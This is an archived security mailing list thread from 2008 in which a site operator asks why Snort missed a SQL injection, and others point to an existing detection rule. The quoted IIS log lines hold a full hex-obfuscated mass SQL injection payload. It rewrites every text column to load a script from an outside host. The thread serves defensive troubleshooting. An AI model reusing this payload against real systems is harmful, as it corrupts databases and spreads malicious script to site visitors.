[Snort-users] Undetected SQL Injection

Joel Esler joel.esler at ...3027...
Tue Jun 24 08:16:43 EDT 2008


Yup

--
Joel Esler
Sent from my iPhone

On Jun 24, 2008, at 7:30 AM, Leon Ward <seclists at ...14165...> wrote:

> Hi, I assume Joel is referring to good old 1:13791.
> SQL oversized cast statement - possible sql injection obfuscation
>
> -Leon
>
> On 24 Jun 2008, at 09:07, Patrik Nordlén wrote:
>
>> Which rule is that?
>>
>>    /Patrik
>>
>> On Monday 23 June 2008 22.18.25 Joel Esler wrote:
>>> There is a rule that will catch these in the most recent SQL.rules
>>> file.
>>>
>>> --
>>> Joel Esler
>>> Sent from my iPhone
>>>
>>> On Jun 23, 2008, at 3:15 PM, Curtis LaMasters
>>>
>>> <curtislamasters at ...11827...> wrote:
>>>> I am running Snort 2.7 on my firewalls and have still somehow been
>>>> SQL injected.  I have the SQL rules, MySQL rules, IIS Rules, and a
>>>> few more but it sill did not detect.  Below I have part of the IIS
>>>> log where the injection (attempt) was done. I was hopeing someone
>>>> could shed some light on the problem. Please let me know if I need
>>>> to provide any additional information.
>>>>
>>>> 2008-06-23 00:30:44 10.99.4.44 GET /com/store/content.asp
>>>> ContentID=10;DECLARE%20 at ...2538...%20VARCHAR(4000);SET%20 at ...2538...=CAST
>>>> (0x4445434C415245204054205641524348415228323535292C4043205641524348415


>>>> 22832353529204445434C415245205461626C655F437572736F7220435552534F5220464F


>>>> 522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A656374


>>>> 7320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420


>>>> 612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970


>>>> 653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F


>>>> 50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C


>>>> 655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F535441


>>>> 5455533D302920424547494E20455845432827555044415445205B272B40542B275D205345


>>>> 54205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030


>>>> 292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F777777


>>>> 2E626E726164772E636F6D2F622E6A733E3C2F7363726970743E2727272920464554434820


>>>> 4E4558542046524F4D20546655F437572736F7220494E544F2040542C404320454E4420434


>>>> C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43757


>>>> 2736F7220% 20AS%20VARCHAR(4000));EXEC(@S);--|21|800a0d5d|
>>>> Application_uses_a_value_of_the_wrong_type_for_the_current_operation 

>>>> .
>>>> 80 - 201.208.89.82 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT
>>>> +5.1;+.NET+CLR+2.0.50727) 500 0 0
>>>>
>>>> 2008-06-23 01:23:24 10.99.4.44 GET /com/store/com_viewItem.asp
>>>> idProduct=9;DECLARE%20 at ...2538...%20VARCHAR(4000);SET%20 at ...2538...=CAST
>>>> (0x4445434C415245204054205641524348415228323535292C4043205641524348415


>>>> 22832353529204445434C415245205461626C655F437572736F7220435552534F5220464F


>>>> 522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A656374


>>>> 7320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420


>>>> 612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970


>>>> 653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F


>>>> 50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C


>>>> 655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F535441


>>>> 5455533D302920424547494E20455845432827555044415445205B272B40542B275D205345


>>>> 54205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030


>>>> 292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F777777


>>>> 2E70696E676164772E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348


>>>> 204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E


>>>> 4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C65


>>>> 5F437572736F7220% 20AS%20VARCHAR(4000));EXEC(@S);-- 80 -
>>>> 59.178.127.68
>>>> Mozilla/4.0+ (compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR
>>>> +2.0.50727)
>>>> 302 0 0
>>>>
>>>> Curtis LaMasters
>>>> http://www.curtis-lamasters.com
>>>> http://www.builtnetworks.com
>>>> ---
>>>> ---
>>>> -------------------------------------------------------------------
>>>> Check out the new SourceForge.net Marketplace.
>>>> It's the best place to buy or sell services for
>>>> just about anything Open Source.
>>>> http://sourceforge.net/services/buy/index.php
>>>> _______________________________________________
>>>> Snort-users mailing list
>>>> Snort-users at lists.sourceforge.net
>>>> Go to this URL to change user options or unsubscribe:
>>>> https://lists.sourceforge.net/lists/listinfo/snort-users
>>>> Snort-users list archive:
>>>> http://www.geocrawler.com/redir-sf.php3?list=snort-users
>>
>>
>> ---
>> ---
>> -------------------------------------------------------------------
>> Check out the new SourceForge.net Marketplace.
>> It's the best place to buy or sell services for
>> just about anything Open Source.
>> http://sourceforge.net/services/buy/index.php_______________________________________________
>> Snort-users mailing list
>> Snort-users at lists.sourceforge.net
>> Go to this URL to change user options or unsubscribe:
>> https://lists.sourceforge.net/lists/listinfo/snort-users
>> Snort-users list archive:
>> http://www.geocrawler.com/redir-sf.php3?list=snort-users
>
>
> ---
> ----------------------------------------------------------------------
> Check out the new SourceForge.net Marketplace.
> It's the best place to buy or sell services for
> just about anything Open Source.
> http://sourceforge.net/services/buy/index.php
> _______________________________________________
> Snort-users mailing list
> Snort-users at lists.sourceforge.net
> Go to this URL to change user options or unsubscribe:
> https://lists.sourceforge.net/lists/listinfo/snort-users
> Snort-users list archive:
> http://www.geocrawler.com/redir-sf.php3?list=snort-users




More information about the Snort-users mailing list